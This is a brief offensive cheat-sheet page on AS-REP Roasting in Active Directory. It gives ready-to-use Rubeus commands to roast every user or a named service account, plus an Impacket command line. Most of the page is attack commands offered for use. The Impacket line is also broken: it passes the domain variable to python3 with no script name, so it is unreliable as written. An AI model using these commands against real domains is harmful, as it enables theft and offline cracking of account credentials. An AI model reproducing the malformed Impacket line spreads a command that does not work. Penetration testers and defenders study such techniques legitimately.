AS-REP Roasting

If a user does not require Kerberos pre-authentication, an attacker can request an AS-REP for the user and crack the retrieved hash offline.

AS-REP Roasting with Rubeus

# AS-REP Roast all users (burn your opsec):
.\Rubeus.exe asreproast /nowrap

# AS-REP Roast a specific user:
.\Rubeus.exe asreproast /user:$serviceaccount /nowrap

AS-REP Roasting with Impacket

# AS-REP Roast with Impacket
python3 $domain -dc-ip $dcip -usersfile $userfile

Last updated